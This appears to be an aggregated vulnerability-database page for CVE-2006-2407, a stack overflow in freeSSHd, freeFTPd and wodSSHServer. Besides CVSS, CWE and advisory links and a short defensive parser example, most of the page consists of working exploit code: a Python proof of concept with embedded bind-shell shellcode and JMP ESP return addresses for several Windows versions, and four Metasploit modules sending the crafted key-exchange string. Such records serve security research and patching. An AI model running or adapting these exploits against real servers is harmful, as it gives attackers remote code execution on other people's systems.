CVE-2006-2407
CVSS 7.5
Published: 2006-05-16 06:02:00
Last modified: 2016-10-17 23:39:53

[Original] Stack-based buffer overflow in (1) WeOnlyDo wodSSHServer ActiveX Component 1.2.7 and 1.3.3 DEMO, as used in other products including (2) FreeSSHd 1.0.9 and (3) freeFTPd 1.0.10, allows remote attackers to execute arbitrary code via a long key exchange algorithm string.


[CNNVD] wodSSHServer/freeSSHd crafted key exchange algorithm string overflow vulnerability (CNNVD-200605-308)

        wodSSHServer and freeSSHd are both products that implement and support SSH.
        wodSSHServer and freeSSHd contain an overflow vulnerability in the handling of a specially crafted key exchange algorithm string sent by an SSH client; an attacker can execute arbitrary code by sending a specially crafted request to the server.
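The record describes a length-trusting copy of the kex_algorithms name-list. As an added defensive illustration (not code from the page, from wodSSHServer or from freeSSHd), here is a bounded parser for that field; the 1024-byte limit, the buffer sizes and the function names are assumptions:

```c
/* Added example, not code from the page or from the products it names: bounded
 * parsing of the kex_algorithms name-list of an SSH_MSG_KEXINIT payload (RFC 4253
 * section 7.1). The record's flaw is the opposite pattern, a copy that trusts the
 * peer's length field into a fixed stack buffer. Limits and sizes are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SSH_MSG_KEXINIT    20
#define KEXINIT_COOKIE_LEN 16
#define KEX_NAMELIST_MAX   1024  /* assumed policy limit for one name-list */

enum kex_status { KEX_OK = 0, KEX_ERR_TRUNCATED, KEX_ERR_TYPE,
                  KEX_ERR_TOO_LONG, KEX_ERR_CHARSET };

/* payload = the bytes after packet_length/padding_length. The name-list is
 * copied into out (NUL-terminated) only after every bound has been checked. */
enum kex_status parse_kex_algorithms(const uint8_t *payload, size_t len,
                                     char *out, size_t out_cap)
{
    size_t off = 1 + KEXINIT_COOKIE_LEN;            /* skip type byte + cookie */
    uint32_t nlen;
    if (len < off + 4) return KEX_ERR_TRUNCATED;
    if (payload[0] != SSH_MSG_KEXINIT) return KEX_ERR_TYPE;
    nlen = ((uint32_t)payload[off] << 24) | ((uint32_t)payload[off + 1] << 16) |
           ((uint32_t)payload[off + 2] << 8) | (uint32_t)payload[off + 3];
    off += 4;
    if (nlen > len - off) return KEX_ERR_TRUNCATED;                /* length field lies */
    if (nlen > KEX_NAMELIST_MAX || nlen >= out_cap) return KEX_ERR_TOO_LONG;
    for (uint32_t i = 0; i < nlen; i++)                            /* printable ASCII, no spaces */
        if (payload[off + i] <= 0x20 || payload[off + i] >= 0x7f) return KEX_ERR_CHARSET;
    memcpy(out, payload + off, nlen);
    out[nlen] = '\0';
    return KEX_OK;
}

/* Builds a constructed KEXINIT payload (type byte, zero cookie, `declared` as the
 * length field, which may disagree with body_len on purpose) and parses it. */
enum kex_status check_namelist(uint32_t declared, const uint8_t *body, size_t body_len)
{
    uint8_t pkt[4096];
    char out[KEX_NAMELIST_MAX + 1];
    size_t hdr = 1 + KEXINIT_COOKIE_LEN + 4;
    if (hdr + body_len > sizeof pkt) return KEX_ERR_TRUNCATED;
    pkt[0] = SSH_MSG_KEXINIT;
    memset(pkt + 1, 0, KEXINIT_COOKIE_LEN);
    pkt[17] = (uint8_t)(declared >> 24); pkt[18] = (uint8_t)(declared >> 16);
    pkt[19] = (uint8_t)(declared >> 8);  pkt[20] = (uint8_t)declared;
    memcpy(pkt + hdr, body, body_len);
    return parse_kex_algorithms(pkt, hdr + body_len, out, sizeof out);
}
```

A body of 2014 filler bytes with a matching length field (the 0x07de value the record's exploits declare) is rejected as KEX_ERR_TOO_LONG before any copy, and a length field larger than the bytes actually received is rejected as KEX_ERR_TRUNCATED.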

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:freesshd:freesshd:1.0.9
cpe:/a:freeftpd:freeftpd:1.0.10
cpe:/a:weonlydo:wodsshserver:1.2.7
cpe:/a:weonlydo:wodsshserver:1.3.3_demo

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2407
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2407
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-308
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=full-disclosure&m=114764338702488&w=2
(UNKNOWN)  FULLDISC  20060514 POC exploit for freeSSHd version 1.0.9
http://securityreason.com/securityalert/901
(UNKNOWN)  SREASON  901
http://www.kb.cert.org/vuls/id/477960
(UNKNOWN)  CERT-VN  VU#477960
http://www.securityfocus.com/archive/1/archive/1/434007/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060514 POC exploit for freeSSHd version 1.0.9
http://www.securityfocus.com/archive/1/archive/1/434038/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060515 Re: [Full-disclosure] POC exploit for freeSSHd version 1.0.9
http://www.securityfocus.com/archive/1/archive/1/434402/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/archive/1/archive/1/434415/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060517 BUGTRAQ:20060517 Re:POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/archive/1/archive/1/434415/30/4920/threaded
(UNKNOWN)  BUGTRAQ  20060517 Re:POC exploit for freeFTPd 1.0.10
http://www.securityfocus.com/bid/17958
(UNKNOWN)  BID  17958
http://www.vupen.com/english/advisories/2006/1785
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1785
http://www.vupen.com/english/advisories/2006/1786
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1786
http://www.vupen.com/english/advisories/2006/1842
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1842
http://xforce.iss.net/xforce/xfdb/26442
(UNKNOWN)  XF  freesshd-key-exchange-bo(26442)

- Vulnerability information

wodSSHServer/freeSSHd crafted key exchange algorithm string overflow vulnerability
High risk  Buffer overflow
2006-05-16 00:00:00 2006-05-30 00:00:00
Remote
        wodSSHServer and freeSSHd are both products that implement and support SSH.
        wodSSHServer and freeSSHd contain an overflow vulnerability in the handling of a specially crafted key exchange algorithm string sent by an SSH client; an attacker can execute arbitrary code by sending a specially crafted request to the server.

- Advisories and patches

        The vendor has not yet provided a patch or upgrade; users of this software are advised to monitor the vendor's home page for the latest version:
        http://freesshd.com/
        http://www.weonlydo.com/index.asp?showform=SSHServer

- Vulnerability information (1787)

freeSSHd <= 1.0.9 Key Exchange Algorithm Buffer Overflow Exploit (EDBID:1787)
windows remote
2006-05-15 Verified
22 Tauqeer Ahmad
#!/usr/bin/env python

"""
Coded by Tauqeer Ahmad a.k.a 0x-Scientist-x0
ahmadtauqeer[at]yahoo.com
Disclaimer: This Proof of concept exploit is for educational purpose only.
           Please do not use it against any system without prior permission.
           You are responsible for yourself for what you do with this code.

Greetings: All the Pakistani White Hats including me ;)
Flames:    To all the skript kiddies out there. Man grow up!.
Code tested against freeSSHd version 1.0.9
If you didn't get shell at first try, try few times and you will get lucky

Advisories:
http://www.securityfocus.com/bid/17958
http://www.frsirt.com/english/advisories/2006/1786

"""
import socket
import getopt
import sys

host = "192.168.0.2"
port = 0
eip =""

#/* win32_bind -  EXITFUNC=thread LPORT=1977 Size=317 Encoder=None http://metasploit.com */
shellcode =    "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45" \
               "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49" \
               "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d" \
               "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66" \
               "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61" \
               "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40" \
               "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32" \
               "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6" \
               "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09" \
               "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0" \
               "\x66\x68\x07\xb9\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff" \
               "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53" \
               "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff" \
               "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64" \
               "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89" \
               "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab" \
               "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51" \
               "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53" \
               "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6" \
               "\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0"


def exploit():

   buff = "\x53\x53\x48\x2d\x31\x2e\x39\x39\x2d\x4f\x70\x65\x6e\x53\x53\x48" \
          "\x5f\x33\x2e\x34\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00" \
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"

   buff = buff + "A" * 1055
   buff = buff + eip
   buff = buff + "yyyy"
   buff = buff + "\x90" * 4
   buff = buff + shellcode
   buff = buff + "B" * 19021 + "\r\n"

   sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
   sock.connect((host, port))
   print "+ Received reply from server: " + sock.recv(1000)

   sock.send(buff)
   print "+ SSHD exploited. Now telnet to port 1977 to get shell "
   print "+ if you didn't get a shell on the first try, try again until you succeed"

   sock.close()
   sock = None


def usage():
   print "#############################################"
   print "#           CODED BY TAUQEER AHMAD          #"
   print "#                 Scientist                 #"
   print "#############################################"
   print "\n"
   print "Usage: %s -h <hostip> -p <port> -o <OS>" % sys.argv[0]
   print "Following OS supported\n"
   print "1 Window XP SP1"
   print "2 Window XP SP2"
   print "3 Windows 2000 Advanced Server"


if __name__ == '__main__':

   if len(sys.argv) < 7:
       usage()
       sys.exit()

   try:
       options = getopt.getopt(sys.argv[1:], 'h:p:o:')[0]
   except getopt.GetoptError, err:
       print err
       usage()
       sys.exit()


   for option, value in options:
       if option == '-h':
           host = value
       if option == '-p':
           port = int(value)
       if option == '-o':
           if value == '1':
               eip = "\xFC\x18\xD7\x77"  # 77D718FC JMP ESP IN USER32.dll (Windows Xp professional SP1)
           elif value == '2':
               eip = "\x0A\xAF\xD8\x77"  # 77D8AF0A JMP ESP IN USER32.DLL (Windows Xp professional SP2)
           elif value == '3':
               eip = "\x4D\x3F\xE3\x77"  # 77E33F4D JMP ESP IN USER32.DLL (windows 2000 advanced server)
           elif value == '4':
               eip = "\x29\x4c\xE1\x77"  # 77E14c29 JMP ESP IN USER32.DLL (windows 2000 Prof. SP4)
           else:
               usage()
               sys.exit()

   exploit()

# milw0rm.com [2006-05-15]
		

- Vulnerability information (16461)

FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow (EDBID:16461)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: freesshd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in FreeSSHd 1.0.9.
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2407'],
					['OSVDB', '25463'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e51877 } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77e53877 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 12 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(22)
			], self.class)
	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1"
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

		res = sock.recv(22)
		if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
			print_status("Trying target #{target.name}...")
			sock.put(sploit)
		else
			print_status("Not running a vulnerable version...")
		end

		handler
		disconnect

	end
end
		

- Vulnerability information (16462)

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow (EDBID:16462)
windows remote
2010-05-09 Verified
0 metasploit
##
# $Id: freeftpd_key_exchange.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
					This module exploits a simple stack buffer overflow in FreeFTPd 1.0.10
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
				This module is based on MC's freesshd_key_exchange exploit.
			},
			'Author'         => 'riaf [at] mysec.org',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2407'],
					['OSVDB', '25569'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-SP4 English',  			{ 'Ret' => 0x750231e2 } ],
					[ 'Windows 2000 SP0-SP4 German',   			{ 'Ret' => 0x74f931e2 } ],
					[ 'Windows XP SP0-SP1 English',    			{ 'Ret' => 0x71ab1d54 } ],
					[ 'Windows XP SP2 English',       		 	{ 'Ret' => 0x71ab9372 } ],
				],
			'Privileged'     => true,
			'DisclosureDate' => 'May 12 2006',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(22)
			], self.class)
	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1"
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"

		res = sock.recv(40)
		if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
			print_status("Trying target #{target.name}...")
			sock.put(sploit)
		else
			print_status("Not running a vulnerable version...")
		end

		handler
		disconnect

	end
end
		

- Vulnerability information (F83202)

FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow (PacketStormID:F83202)
2009-11-26 00:00:00
riaf  metasploit.com
exploit,overflow
CVE-2006-2407

This Metasploit module exploits a simple stack overflow in FreeFTPd 1.0.10. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client. This Metasploit module is based on MC's freesshd_key_exchange exploit.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in FreeFTPd 1.0.10
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
				This module is based on MC's freesshd_key_exchange exploit.
			},
			'Author'         => 'riaf [at] mysec.org',
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-2407'],
					['OSVDB', '25569'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 SP0-SP4 English',  			{ 'Ret' => 0x750231e2 } ],
					[ 'Windows 2000 SP0-SP4 German',   			{ 'Ret' => 0x74f931e2 } ],
					[ 'Windows XP SP0-SP1 English',    			{ 'Ret' => 0x71ab1d54 } ],
					[ 'Windows XP SP2 English',       		 	{ 'Ret' => 0x71ab9372 } ], 
				],

			'Privileged'     => true,

			'DisclosureDate' => 'May 12 2006',

			'DefaultTarget' => 0))

			register_options( [ Opt::RPORT(22) ], self.class)

	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1" 
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
               
		res = sock.recv(40)
			if ( res =~ /SSH-2\.0-WeOnlyDo-wodFTPD 2\.1\.8\.98/)
				print_status("Trying target #{target.name}...")
				sock.put(sploit)                                
			else
				print_status("Not running a vulnerable version...")
			end
  
		handler
		disconnect

	end
end
    

- Vulnerability information (F83007)

FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow (PacketStormID:F83007)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-2407

This Metasploit module exploits a simple stack overflow in FreeSSHd 1.0.9. This flaw is due to a buffer overflow error when handling a specially crafted key exchange algorithm string received from an SSH client.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow',
			'Description'    => %q{
				This module exploits a simple stack overflow in FreeSSHd 1.0.9.
				This flaw is due to a buffer overflow error when handling a specially
				crafted key exchange algorithm string received from an SSH client.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2006-2407'],
					['OSVDB', '25463'],
					['BID', '17958'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x77e56f43 } ],
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e51877 } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77e53877 } ],
				],

			'Privileged'     => true,

			'DisclosureDate' => 'May 12 2006',

			'DefaultTarget' => 0))

			register_options( [ Opt::RPORT(22) ], self.class)

	end

	def exploit
		connect

		sploit =  "SSH-2.0-OpenSSH_3.9p1" 
		sploit << "\x0a\x00\x00\x4f\x04\x05\x14\x00\x00\x00\x00\x00\x00\x00"
		sploit << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\xde"
		sploit << rand_text_alphanumeric(1055) + [target.ret].pack('V')
		sploit << payload.encoded + rand_text_alphanumeric(19000) + "\r\n"
               
		res = sock.recv(22)
			if ( res =~ /SSH-2.0-WeOnlyDo 1.2.7/)
				print_status("Trying target #{target.name}...")
				sock.put(sploit)                                
			else
				print_status("Not running a vulnerable version...")
			end
  
		handler
		disconnect

	end
end
    

- Vulnerability information

25461
wodSSHServer Key Exchange Algorithm String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2006-05-12 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete